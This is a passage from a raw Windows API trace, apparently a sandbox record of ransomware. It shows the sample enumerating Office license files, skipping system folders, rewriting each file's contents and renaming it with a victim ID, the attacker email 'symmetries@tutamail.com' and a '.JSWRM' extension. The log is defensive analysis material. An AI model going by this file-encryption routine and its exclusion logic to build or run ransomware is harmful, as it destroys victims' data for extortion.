(lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2="...") returned 1 [0109.134] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2="windows") returned -1 [0109.134] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2="recovery") returned -1 [0109.134] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.134] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.134] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.134] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.134] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-pl.xrm-ms", lpString2="msocache") returned 1 [0109.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0109.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0109.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0109.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0109.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.135] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0109.136] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0109.136] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0109.185] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.185] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0109.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.185] CloseHandle (hObject=0x45c) returned 1 [0109.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0109.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0109.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0109.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0109.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0109.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.186] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0109.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0109.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0109.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.187] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea282534, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea282534, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea31aebb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5eef, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp5-ppd.xrm-ms", cAlternateFileName="PR849E~1.XRM")) returned 1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2=".") returned 1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2="..") returned 1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2="...") returned 1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2="windows") returned -1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.188] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0109.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0109.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0109.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0109.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0109.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0109.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.189] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24303) returned 1 [0109.189] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24c1d0 [0109.189] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.192] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.192] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.192] CloseHandle (hObject=0x45c) returned 1 [0109.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0109.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0109.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0109.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0109.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0109.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0109.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.193] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0109.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0109.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0109.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0109.194] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea5efb78, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea5efb78, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea805c87, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", cAlternateFileName="PR631E~1.XRM")) returned 1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.194] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0109.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0109.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0109.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0109.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0109.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0109.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.195] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0109.195] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.195] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.198] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.198] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.198] CloseHandle (hObject=0x45c) returned 1 [0109.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0109.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0109.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0109.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0109.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0109.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0109.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.198] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0109.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0109.200] HeapFree (in: 